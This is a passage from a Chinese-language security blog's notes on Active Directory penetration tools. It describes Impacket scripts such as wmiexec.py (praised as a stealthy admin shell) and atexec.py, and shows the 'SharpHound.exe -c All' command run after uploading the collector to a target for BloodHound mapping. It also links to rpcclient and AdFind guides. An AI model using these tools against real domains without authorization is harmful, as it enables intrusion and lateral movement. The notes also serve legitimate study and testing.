<li>sniffer.py：一个简单的数据包嗅探脚本，使用原始套接字来侦听与指定协议相对应的传输数据包</li>
<li>wmiexec.py：生成一个使用 Windows Management Instrumentation 的半交互式shell，并以管理员身份运行。你不需要在目标服务器上安装任何的服务&#x2F;代理，因此它非常的隐蔽。</li>
<li>wmiquery.py：发出WQL查询并获取目标系统WMI对象的描述信息</li>
<li>atexec.py：通过Task Scheduler服务在目标系统上执行命令，并返回输出结果</li>
<li>getArch.py：该脚本将连接目标（或目标列表上的）计算机，并使用已记录的 MSRPC 特征收集由（ab）安装的操作系统架构类型。</li>
<li>ifmap.py：该脚本将绑定到目标的 MGMT 接口，以获取接口 ID 列表。它将在另一个接口 UUID 列表的顶部使用该列表，并报告该接口是否被列出和&#x2F;或处于侦听状态</li>
</ul>
<hr>
<h2 id="BloodHound"><a href="#BloodHound" class="headerlink" title="BloodHound"></a>BloodHound</h2><p>自动化分析域环境，可以揭示并分析域环境中各对象之间的关系，建议使用 docker 安装</p>
<p>基于 neo4j 数据库</p>
<p>首先传 SharpHound 数据采集器到目标机器上，采集并导出数据</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">SharpHound<span class="token punctuation">.</span>exe <span class="token operator">-</span>c All<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>SharpHound 会自动采集域内的用户、用户组、计算机、组策略、域信任关系等信息，然后会在当前目录下生成一个 zip 文件</p>
<hr>
<h2 id="rpcclient"><a href="#rpcclient" class="headerlink" title="rpcclient"></a>rpcclient</h2><p>参考： <a target="_blank" rel="noopener" href="https://www.cnblogs.com/kqdssheng/p/18857416#id4">https://www.cnblogs.com/kqdssheng/p/18857416#id4</a></p>
<hr>
<h2 id="AdFind"><a href="#AdFind" class="headerlink" title="AdFind"></a>AdFind</h2><p>参考： <a target="_blank" rel="noopener" href="http://nooemotion.com/2023/02/20/%E5%9F%9F%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B0-%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8-adfind/">http://nooemotion.com/2023/02/20/%E5%9F%9F%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B0-%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8-adfind/</a></p>

    </div>
    
    
    
    
    
    
    
</div>

            </div>
        </transition>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/blog/js/main.js"></script>
    
    




    
    

<div id="vcomments"></div>

<script src="/blog/js/lib/valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: 'U9mZLKunkRUTcBFthjXPjnZE-9Nh9j0Va',
        app_key: 'SzWOnY0PWLGNuL6jW8TZYc7j',
        visitor: 'true',
        placeholder: '写点什么吧(●ˇ∀ˇ●)',
        serverURLs: 'https://u9mzlkun.lc-cn-n1-shared.com',
    });
</script>

    <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2026 雲流のLowest World
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;C1oudfL0w0
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

<script src="/blog/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/blog/live2dw/assets/z16.model.json"},"display":{"position":"left","width":150,"height":290},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>